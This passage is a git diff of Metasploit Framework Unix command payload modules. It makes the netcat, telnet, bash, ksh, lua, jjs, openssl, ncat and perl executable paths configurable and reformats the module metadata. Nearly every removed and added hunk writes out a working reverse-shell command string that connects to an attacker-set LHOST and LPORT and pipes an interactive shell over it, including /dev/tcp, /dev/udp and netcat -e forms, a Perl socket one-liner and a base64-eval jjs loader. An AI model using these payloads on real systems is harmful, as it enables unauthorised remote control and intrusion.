-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::Pingback,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat'
+     'Name'          => 'Unix Command Shell, Pingback Reverse TCP (via netcat)',
+     'Description'   => 'Creates a socket, send a UUID, then exit',
+     'Author'        =>
+       [
+         'asoto-r7'
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::Pingback,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat'
     ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc'])
+      ]
+    )
   end
 
   #
@@ -42,6 +47,6 @@ module MetasploitModule
   #
   def command_string
     self.pingback_uuid ||= self.generate_pingback_uuid
-    "printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | nc #{datastore['LHOST']} #{datastore['LPORT']}"
+    "printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | #{datastore['NetcatPath']} #{datastore['LHOST']} #{datastore['LPORT']}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse.rb
+++ b/modules/payloads/singles/cmd/unix/reverse.rb
@@ -13,22 +13,28 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Double Reverse TCP (telnet)',
-      'Description'   => 'Creates an interactive shell through two inbound connections',
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcpDouble,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'telnet',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Double Reverse TCP (telnet)',
+     'Description'   => 'Creates an interactive shell through two inbound connections',
+     'Author'        => 'hdm',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcpDouble,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'telnet',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('TelnetPath', [true, 'The path to the telnet executable', 'telnet']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', 'sh'])
+      ]
+    )
   end
 
   #
@@ -44,11 +50,11 @@ module MetasploitModule
   #
   def command_string
     cmd =
-      "sh -c '(sleep #{3600+rand(1024)}|" +
-      "telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
-      "while : ; do sh && break; done 2>&1|" +
-      "telnet #{datastore['LHOST']} #{datastore['LPORT']}" +
-      " >/dev/null 2>&1 &)'"
+      "#{datastore['ShellPath']} -c '(sleep #{3600+rand(1024)}|" +
+        "#{datastore['TelnetPath']} #{datastore['LHOST']} #{datastore['LPORT']}|" +
+        "while : ; do #{datastore['ShellPath']} && break; done 2>&1|" +
+        "#{datastore['TelnetPath']} #{datastore['LHOST']} #{datastore['LPORT']}" +
+        " >/dev/null 2>&1 &)'"
     return cmd
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_bash.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb
@@ -13,28 +13,34 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP (/dev/tcp)',
-      'Description'   => %q{
+     'Name'          => 'Unix Command Shell, Reverse TCP (/dev/tcp)',
+     'Description'   => %q{
         Creates an interactive shell via bash's builtin /dev/tcp.
 
         This will not work on circa 2009 and older Debian-based Linux
         distributions (including Ubuntu) because they compile bash
         without the /dev/tcp feature.
       },
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd_bash',
-      'RequiredCmd'   => 'bash-tcp',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Author'        => 'hdm',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd_bash',
+     'RequiredCmd'   => 'bash-tcp',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('BashPath', [true, 'The path to the Bash executable', 'bash']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', 'sh'])
+      ]
+    )
   end
 
   #
@@ -50,7 +56,7 @@ module MetasploitModule
   #
   def command_string
     fd = rand(200) + 20
-    return "bash -c '0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}'";
+    return "#{datastore['BashPath']} -c '0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};#{datastore['ShellPath']} <&#{fd} >&#{fd} 2>&#{fd}'";
     # same thing, no semicolons
     #return "/bin/bash #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} <&#{fd} >&#{fd}"
     # same thing, no spaces

--- a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
@@ -13,27 +13,32 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP SSL (telnet)',
-      'Description'   => %q{
+       'Name'          => 'Unix Command Shell, Reverse TCP SSL (telnet)',
+       'Description'   => %q{
         Creates an interactive shell via mkfifo and telnet.
         This method works on Debian and other systems compiled
         without /dev/tcp support. This module uses the '-z'
         option included on some systems to encrypt using SSL.
         },
-      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcpSsl,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'telnet',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+       'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+       'License'       => MSF_LICENSE,
+       'Platform'      => 'unix',
+       'Arch'          => ARCH_CMD,
+       'Handler'       => Msf::Handler::ReverseTcpSsl,
+       'Session'       => Msf::Sessions::CommandShell,
+       'PayloadType'   => 'cmd',
+       'RequiredCmd'   => 'telnet',
+       'Payload'       =>
+         {
+           'Offsets' => { },
+           'Payload' => ''
+         }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('TelnetPath', [true, 'The path to the telnet executable', 'telnet'])
+      ]
+    )
   end
 
   #
@@ -49,6 +54,6 @@ module MetasploitModule
   #
   def command_string
     pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 )
-    "mkfifo #{pipe_name} && telnet -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
+    "mkfifo #{pipe_name} && #{datastore['TelnetPath']} -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
@@ -13,31 +13,37 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse UDP (/dev/udp)',
-      'Description'   => %q{
-        Creates an interactive shell via bash's builtin /dev/udp.
+     'Name'          => 'Unix Command Shell, Reverse UDP (/dev/udp)',
+     'Description'   => %q{
+          Creates an interactive shell via bash's builtin /dev/udp.
 
-        This will not work on circa 2009 and older Debian-based Linux
-        distributions (including Ubuntu) because they compile bash
-        without the /dev/udp feature.
-      },
-      'Author'        => [
-        'hdm',   # Reverse bash TCP
-        'bcoles' # Reverse bash UDP
-      ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseUdp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd_bash',
-      'RequiredCmd'   => 'bash-udp',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+          This will not work on circa 2009 and older Debian-based Linux
+          distributions (including Ubuntu) because they compile bash
+          without the /dev/udp feature.
+          },
+     'Author'        => [
+       'hdm',   # Reverse bash TCP
+       'bcoles' # Reverse bash UDP
+     ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseUdp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd_bash',
+     'RequiredCmd'   => 'bash-udp',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('BashPath', [true, 'The path to the Bash executable', 'bash']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', 'sh'])
+      ]
+    )
   end
 
   #
@@ -53,7 +59,7 @@ module MetasploitModule
   #
   def command_string
     fd = rand(200) + 20
-    return "bash -c '0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};sh <&#{fd} >&#{fd} 2>&#{fd}'";
+    return "#{datastore['BashPath']} -c '0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};#{datastore['ShellPath']} <&#{fd} >&#{fd} 2>&#{fd}'";
 
     # no semicolons
     #return "sh -i >& /dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1"

--- a/modules/payloads/singles/cmd/unix/reverse_jjs.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_jjs.rb
@@ -13,29 +13,36 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP (via jjs)',
-      'Description' => 'Connect back and create a command shell via jjs',
-      'Author'      => [
-        'conerpirate', # jjs reverse shell
-        'bcoles'       # metasploit
-      ],
-      'References'    => [
-        ['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
-        ['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
-        ['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
-      ],
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'jjs',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Reverse TCP (via jjs)',
+     'Description' => 'Connect back and create a command shell via jjs',
+     'Author'      => [
+       'conerpirate', # jjs reverse shell
+       'bcoles'       # metasploit
+     ],
+     'References'    => [
+       ['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
+       ['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
+       ['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
+     ],
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'jjs',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
-    register_options [
-      OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ])
-    ]
+    register_options(
+      [
+        OptString.new('SHELL', [ true, 'The shell to execute', '/bin/sh' ])
+      ]
+    )
+    register_advanced_options(
+      [
+        OptString.new('JJSPath', [true, 'The path to the JJS executable', 'jjs'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -64,8 +71,8 @@ module MetasploitModule
       };
       p.destroy();s.close();
   }
-  minified = jcode.split("\n").map(&:lstrip).join
+    minified = jcode.split("\n").map(&:lstrip).join
 
-  %Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|jjs}
+    %Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|#{datastore['JJSPath']}}
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_ksh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ksh.rb
@@ -13,21 +13,26 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP (via Ksh)',
-      'Description' => %q{
+     'Name'        => 'Unix Command Shell, Reverse TCP (via Ksh)',
+     'Description' => %q{
         Connect back and create a command shell via Ksh.  Note: Although Ksh is often
         available, please be aware it isn't usually installed by default.
       },
-      'Author'      => 'Wang Yihang <wangyihanger[at]gmail.com>',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ksh',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Author'      => 'Wang Yihang <wangyihanger[at]gmail.com>',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ksh',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
+    register_advanced_options(
+      [
+        OptString.new('KSHPath', [true, 'The path to the KSH executable', 'ksh'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -35,6 +40,6 @@ module MetasploitModule
   end
 
   def command_string
-    "ksh -c 'ksh >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 2>&1 <&1'"
+    "#{datastore['KSHPath']} -c '#{datastore['KSHPath']} >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 2>&1 <&1'"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_lua.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_lua.rb
@@ -13,25 +13,30 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP (via Lua)',
-      'Description'   => 'Creates an interactive shell via Lua',
-      'Author'        =>
-      [
-        'xistence <xistence[at]0x90.nl>',
-      ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'lua',
-      'Payload'       =>
-      {
-        'Offsets' => { },
-        'Payload' => ''
-      }
+     'Name'          => 'Unix Command Shell, Reverse TCP (via Lua)',
+     'Description'   => 'Creates an interactive shell via Lua',
+     'Author'        =>
+       [
+         'xistence <xistence[at]0x90.nl>',
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'lua',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
     ))
+    register_advanced_options(
+      [
+        OptString.new('LuaPath', [true, 'The path to the Lua executable', 'lua'])
+      ]
+    )
   end
 
   #
@@ -46,7 +51,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "lua -e \"local s=require('socket');local t=assert(s.tcp());t:connect('#{datastore['LHOST']}',#{datastore['LPORT']});while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();\""
+    "#{datastore['LuaPath']} -e \"local s=require('socket');local t=assert(s.tcp());t:connect('#{datastore['LHOST']}',#{datastore['LPORT']});while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();\""
   end
 end
 

--- a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
@@ -13,22 +13,28 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP (via ncat)',
-      'Description' => 'Creates an interactive shell via ncat, utilizing ssl mode',
-      'Author'      => 'C_Sto',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcpSsl,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ncat',
-      'Payload'     =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'        => 'Unix Command Shell, Reverse TCP (via ncat)',
+     'Description' => 'Creates an interactive shell via ncat, utilizing ssl mode',
+     'Author'      => 'C_Sto',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcpSsl,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ncat',
+     'Payload'     =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('NcatPath', [true, 'The path to the NCat executable', 'ncat']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+      ]
+    )
   end
 
   #
@@ -42,6 +48,6 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "ncat -e /bin/sh --ssl #{datastore['LHOST']} #{datastore['LPORT']}"
+    "#{datastore['NcatPath']} -e #{datastore['ShellPath']} --ssl #{datastore['LHOST']} #{datastore['LPORT']}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
@@ -13,27 +13,33 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP (via netcat)',
-      'Description'   => 'Creates an interactive shell via netcat',
-      'Author'         =>
-        [
-          'm-1-k-3',
-          'egypt',
-          'juan vazquez'
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Reverse TCP (via netcat)',
+     'Description'   => 'Creates an interactive shell via netcat',
+     'Author'         =>
+       [
+         'm-1-k-3',
+         'egypt',
+         'juan vazquez'
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+      ]
+    )
   end
 
   #
@@ -49,6 +55,6 @@ module MetasploitModule
   #
   def command_string
     backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-    "mkfifo /tmp/#{backpipe}; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
+    "mkfifo /tmp/#{backpipe}; #{datastore['NetcatPath']} #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | #{datastore['ShellPath']} >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
@@ -13,22 +13,28 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP (via netcat -e)',
-      'Description'   => 'Creates an interactive shell via netcat',
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat-e',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Reverse TCP (via netcat -e)',
+     'Description'   => 'Creates an interactive shell via netcat',
+     'Author'        => 'hdm',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat-e',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+      ]
+    )
   end
 
   #
@@ -43,6 +49,6 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh"
+    "#{datastore['NetcatPath']} #{datastore['LHOST']} #{datastore['LPORT']} -e #{datastore['ShellPath']}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_openssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_openssl.rb
@@ -13,22 +13,28 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Double Reverse TCP SSL (openssl)',
-      'Description'   => 'Creates an interactive shell through two inbound connections',
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcpDoubleSSL,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'openssl',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Double Reverse TCP SSL (openssl)',
+     'Description'   => 'Creates an interactive shell through two inbound connections',
+     'Author'        => 'hdm',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcpDoubleSSL,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'openssl',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('OpenSSLPath', [true, 'The path to the OpenSSL executable', 'openssl']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', 'sh'])
+      ]
+    )
   end
 
   #
@@ -44,10 +50,10 @@ module MetasploitModule
   #
   def command_string
     cmd =
-      "sh -c '(sleep #{3600+rand(1024)}|" +
-      "openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}|" +
-      "while : ; do sh && break; done 2>&1|" +
-      "openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}" +
+      "#{datastore['ShellPath']} -c '(sleep #{3600+rand(1024)}|" +
+      "#{datastore['OpenSSLPath']} s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}|" +
+      "while : ; do #{datastore['ShellPath']} && break; done 2>&1|" +
+      "#{datastore['OpenSSLPath']} s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}" +
       " >/dev/null 2>&1 &)'"
     return cmd
   end

--- a/modules/payloads/singles/cmd/unix/reverse_perl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb
@@ -13,22 +13,27 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP (via Perl)',
-      'Description'   => 'Creates an interactive shell via perl',
-      'Author'        => 'cazz',
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'perl',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Reverse TCP (via Perl)',
+     'Description'   => 'Creates an interactive shell via perl',
+     'Author'        => 'cazz',
+     'License'       => BSD_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'perl',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])
+      ]
+    )
   end
 
   #
@@ -46,6 +51,6 @@ module MetasploitModule
     lhost = datastore['LHOST']
     ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-    cmd   = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
+    cmd   = "#{datastore['PerlPath']} -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
@@ -13,22 +13,27 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP SSL (via perl)',
-      'Description'   => 'Creates an interactive shell via perl, uses SSL',
-      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcpSsl,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'perl',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Reverse TCP SSL (via perl)',
+     'Description'   => 'Creates an interactive shell via perl, uses SSL',
+     'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+     'License'       => BSD_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcpSsl,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'perl',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])
+      ]
+    )
   end
 
   #
@@ -46,7 +51,7 @@ module MetasploitModule
     lhost = datastore['LHOST']
     ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-    cmd = "perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);"
+    cmd = "#{datastore['PerlPath']} -e 'use IO::Socket::SSL;$p=fork;exit,if($p);"
